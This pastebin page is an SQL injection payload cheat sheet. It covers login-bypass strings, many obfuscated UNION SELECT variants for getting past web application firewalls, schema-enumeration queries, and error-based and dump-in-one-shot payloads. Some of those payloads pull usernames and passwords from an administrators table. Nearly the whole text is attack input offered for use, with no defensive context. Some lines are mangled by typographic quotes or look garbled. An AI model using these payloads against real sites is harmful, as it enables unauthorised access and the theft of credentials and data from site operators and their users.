pastebin

SQL injection strings to bypas
  1. // SQL injection strings to bypass login
  2.  
  3. ‘ or 1=1 –
  4. 1'or’1'=’1
  5. admin’–
  6. ” or 0=0 –
  7. or 0=0 –
  8. ‘ or 0=0 #
  9. ” or 0=0 #
  10. or 0=0 #
  11. ‘ or ‘x’='x
  12. ” or “x”=”x
  13. ‘) or (‘x’='x
  14. ‘ or 1=1–
  15. ” or 1=1–
  16. or 1=1–
  17. ‘ or a=a–
  18. ” or “a”=”a
  19. ‘) or (‘a’='a
  20. “) or (“a”=”a
  21. hi” or “a”=”a
  22. hi” or 1=1 –
  23. hi’ or 1=1 –
  24. hi’ or ‘a’='a
  25. hi’) or (‘a’='a
  26. hi”) or (“a”=”)
  27. admin'--
  28. = 'or' 1=1
  29. ' or 1=1--
  30. '" or 1=1--
  31. ' union select 1, 'Eyeless', 'ez2do', 1--
  32. admin'--
  33. administrator'--
  34. superuser'--
  35. test'--
  36. ' or 0=0 --
  37. ' or 0=0 --'
  38. ' or 0=0 #
  39. " or 0=0 --
  40. " or 0=0 --'
  41. '" or 0=0 --
  42. or 0=0 --
  43. ' or 0=0 #
  44. " or 0=0 #
  45. or 0=0 #
  46. ' or 'x'='x
  47. " or "x"="x
  48. ') or ('x'='x
  49. " or 1=1--
  50. or 1=1--
  51. ' or a=a--'
  52. ' or a=a #
  53. ' or a=a--
  54. ' or "a"="a
  55. ' or 'a'='a
  56. " or "a"="a
  57. ') or ('a'='a
  58. ") or ("a"="a
  59. hi" or "a"="a
  60. hi" or 1=1 --
  61. hi' or 1=1 --
  62. hi' or 'a'='a
  63. hi') or ('a'='a
  64. hi") Or ("a"="a
  65. ' Or 1=1--
  66. " or 1=1--
  67. or 1=1--
  68. ' or 'a'='a
  69. " Or "a"="a
  70. ') or ('a'='a
  71. [~] Chek Eror [~]
  72.  
  73. 01. '
  74. 02. "
  75. 03. or 1=1
  76. 04. and 1=1
  77. 05. and false
  78. 06. and true
  79. • [Single qiotes]
  80. 01. ' or '1'='1
  81. 02. ' and '1'='1
  82. 03. ' and false
  83. 04. ' and true
  84. • [Double quotes]
  85. 01. " or "1"="1
  86. 02. " and "1"="1
  87. 03. " and false
  88. 04. " and true
  89.  
  90. [~]Baypass True Condition[~]
  91.  
  92. or '1
  93. || '1
  94. null' || 'a'=_binary'a
  95. 1' || 'a'=x'61
  96. 1' && '0'=x'30
  97. 1' %26%26 %270%27%3dx'30
  98. 2' && 0.e1=_binary"0
  99. 1 or 1.e1=0b1010
  100. ' || 1 like 1
  101. '-'
  102. "-"
  103. ' || 2 not like 1
  104. 110 or x'30'=48
  105. '1'!=20
  106. 1 or 20!='1'
  107. 2 and 2>0
  108. 3 || 0<1
  109. 12 || 0b1010<0b1011
  110. 0b11 || 0b1010x'30'
  111. 1 or 0b1
  112. 2121/**/||21
  113. 111' or _binary'1
  114. 1 or 2121
  115. 1' or 12 rlike '1
  116.  
  117.  
  118. [~] KOMENTAR [~]
  119.  
  120. 01. --        : MySQL Linux Style
  121. 02. --+     :   MySQL Windows Style
  122. 03. #         : Hash (URL encode while use)
  123. 04. --+-       :    SQL Comment
  124. 05. ;%00     :  Null Byte
  125. 07. `       :   Backtick
  126. 08. -- -
  127. 09. /*
  128. 10. /**/
  129. 11. %23
  130. 12. //
  131.  
  132.  
  133. [~] order by [~]
  134.  
  135. 01. group by -- +
  136. 02. and extractvalue(0x3a,concat(0x3a,(select count(*) from information_schema.columns where table_name='TABLE_NAME_HERE' and table_schema=database())))--+
  137. 03. Procedure Analyse()--+
  138. 04. and (select * from news)=(select 0)--+
  139. 05. /**/ORDER/**/BY/**/
  140. 06. /*!order*/+/*!by*/
  141. 07. /*!ORDER BY*/
  142. 08. /*!50000ORDER BY*/
  143. 09. /*!50000ORDER*//**//*!50000BY*/
  144. 10. /*!12345ORDER*/+/*!BY*/
  145.  
  146.  
  147. [~] UNION select [~]
  148.  
  149. 01. (uNioN)+(sElECt)….
  150. 02. (uNioN+SeleCT)+…
  151. 03. (UnI)(oN)+(SeL)(ecT)+….
  152. 04. union (select 1,2,3,4…)
  153. 05. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  154. 06. %55nion(%53elect 1,2,3)-- -
  155. 07. +union+distinct+select+
  156. 08. +union+distinctROW+select+
  157. 09. /**//*!12345UNION SELECT*//**/
  158. 10. /**//*!50000UNION SELECT*//**/
  159. 11. /**/UNION/**//*!50000SELECT*//**/
  160. 12. /*!50000UniON SeLeCt*/
  161. 13. union /*!50000%53elect*/
  162. 14. +#uNiOn+#sEleCt
  163. 15. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  164. 16. /*!%55NiOn*/ /*!%53eLEct*/
  165. 17. /*!u%6eion*/ /*!se%6cect*/
  166. 18. +un/**/ion+se/**/lect
  167. 19. uni%0bon+se%0blect
  168. 20. %2f**%2funion%2f**%2fselect
  169. 21. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  170. 22. REVERSE(noinu)+REVERSE(tceles)
  171. 24. /*--*/union/*--*/select/*--*/
  172. 25. union (/*!/**/ SeleCT */ 1,2,3)
  173. 26. /*!union*/+/*!select*/
  174. 27. union+/*!select*/
  175. 28. /**/union/**/select/**/
  176. 29. /**/uNIon/**/sEleCt/**/
  177. 30. +%2F**/+Union/*!select*/
  178. 31. /**//*!union*//**//*!select*//**/
  179. 32. /*!uNIOn*/ /*!SelECt*/
  180. 33. +union+distinct+select+
  181. 34. +union+distinctROW+select+
  182. 35. uNiOn aLl sElEcT
  183. 36. UNIunionON+SELselectECT
  184. /**/union/*!50000select*//**/
  185. 0%a0union%a0select%09
  186. %0Aunion%0Aselect%0A
  187. %55nion/**/%53elect
  188. uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  189. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  190. %0A%09UNION%0CSELECT%10NULL%
  191. /*!union*//*--*//*!all*//*--*//*!select*/
  192. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  193. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  194. +UnIoN/*&a=*/SeLeCT/*&a=*/
  195. union+sel%0bect
  196. +uni*on+sel*ect+
  197. +#1q%0Aunion all#qa%0A#%0Aselect
  198. union(select (1),(2),(3),(4),(5))
  199. UNION(SELECT(column)FROM(table))
  200. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  201. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  202. union(select(1),2,3)
  203. union (select 1111,2222,3333)
  204. uNioN (/*!/**/ SeleCT */ 11)
  205. union (select 1111,2222,3333)
  206. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  207. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  208. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  209. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  210. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  211. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  212. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  213. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  214. /union\sselect/g
  215. /union\s+select/i
  216. /*!UnIoN*/SeLeCT
  217. +UnIoN/*&a=*/SeLeCT/*&a=*/
  218. +uni>on+sel>ect+
  219. +(UnIoN)+(SelECT)+
  220. +(UnI)(oN)+(SeL)(EcT)
  221. +’UnI”On’+'SeL”ECT’
  222. +uni on+sel ect+
  223. +/*!UnIoN*/+/*!SeLeCt*/+
  224. /*!u%6eion*/ /*!se%6cect*/
  225. uni%20union%20/*!select*/%20
  226. union%23aa%0Aselect
  227. /**/union/*!50000select*/
  228. /^.*union.*$/ /^.*select.*$/
  229. /*union*/union/*select*/select+
  230. /*uni X on*/union/*sel X ect*/
  231. +un/**/ion+sel/**/ect+
  232. +UnIOn%0d%0aSeleCt%0d%0a
  233. UNION/*&test=1*/SELECT/*&pwn=2*/
  234. un?<ion sel="">+un/**/ion+se/**/lect+
  235. +UNunionION+SEselectLECT+
  236.  
  237. +uni%0bon+se%0blect+
  238. %252f%252a*/union%252f%252a /select%252f%252a*/
  239. /%2A%2A/union/%2A%2A/select/%2A%2A/
  240. %2f**%2funion%2f**%2fselect%2f**%2f
  241. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  242. /*!UnIoN*/SeLecT+
  243.  
  244. [~] information_schema.tables [~]
  245.  
  246. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  247. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
  248. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  249. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
  250. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  251. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
  252.  
  253. [~] concat() [~]
  254.  
  255. CoNcAt()
  256. concat()
  257. CON%08CAT()
  258. CoNcAt()
  259. %0AcOnCat()
  260. /**//*!12345cOnCat*/
  261. /*!50000cOnCat*/(/*!*/)
  262. unhex(hex(concat(table_name)))
  263. unhex(hex(/*!12345concat*/(table_name)))
  264. unhex(hex(/*!50000concat*/(table_name)))
  265.  
  266. [~] group_concat() [~]
  267.  
  268. /*!group_concat*/()
  269. gRoUp_cOnCAt()
  270. group_concat(/*!*/)
  271. group_concat(/*!12345table_name*/)
  272. group_concat(/*!50000table_name*/)
  273. /*!group_concat*/(/*!12345table_name*/)
  274. /*!group_concat*/(/*!50000table_name*/)
  275. /*!12345group_concat*/(/*!12345table_name*/)
  276. /*!50000group_concat*/(/*!50000table_name*/)
  277. /*!GrOuP_ConCaT*/()
  278. /*!12345GroUP_ConCat*/()
  279. /*!50000gRouP_cOnCaT*/()
  280. /*!50000Gr%6fuP_c%6fnCAT*/()
  281. unhex(hex(group_concat(table_name)))
  282. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  283. unhex(hex(/*!12345group_concat*/(table_name)))
  284. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  285. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  286. unhex(hex(/*!50000group_concat*/(table_name)))
  287. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  288. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  289. convert(group_concat(table_name)+using+ascii)
  290. convert(group_concat(/*!table_name*/)+using+ascii)
  291. convert(group_concat(/*!12345table_name*/)+using+ascii)
  292. convert(group_concat(/*!50000table_name*/)+using+ascii)
  293. CONVERT(group_concat(table_name)+USING+latin1)
  294. CONVERT(group_concat(table_name)+USING+latin2)
  295. CONVERT(group_concat(table_name)+USING+latin3)
  296. CONVERT(group_concat(table_name)+USING+latin4)
  297. CONVERT(group_concat(table_name)+USING+latin5)
  298.  
  299. [~] Eror based [~]
  300.  
  301. • Chek versi
  302. = and (select * from (select name_const(version(),1),name_const(version(),1))a)
  303. • Chek user
  304. = and (select 1 from (select count(*),concat((select(select concat(cast(user() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  305. • Chek database
  306. = and (select 1 from (select count(*),concat((select(select concat(cast(user() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  307. • Chek Table
  308. = and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  309. • Chek Column
  310. = and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e6973747261746f7273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  311. = and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e6973747261746f7273 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  312. = and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e6973747261746f7273 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  313.  
  314. • Dump data
  315. = and (select 1 from (select count(*),concat((select(select concat(cast(concat(user_name,0x3a,user_password) as char),0x7e)) from administrators limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  316. = and (select 1 from (select count(*),concat((select(select concat(cast(concat(user_name,0x3a,user_password) as char),0x7e)) from administrators limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  317.  
  318.  
  319. [~] Using Xpath [~]
  320. 01. and extractvalue(0x0a,concat(0x0a,(OUR QUERY HERE)))--
  321.  
  322. [~]DIOS[~]
  323.  
  324. 01. (select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)
  325. 02. (select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))
  326. 03. (Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
  327. 04. make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
  328. 05. (Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns) where@:=export_set(5,export_set(5,export_set(5,@,table_schema,0x3c6c693e,2),table_name,0xa3a,2),column_name,0xa3a,2)),@,2))
Parsed in 0.025 seconds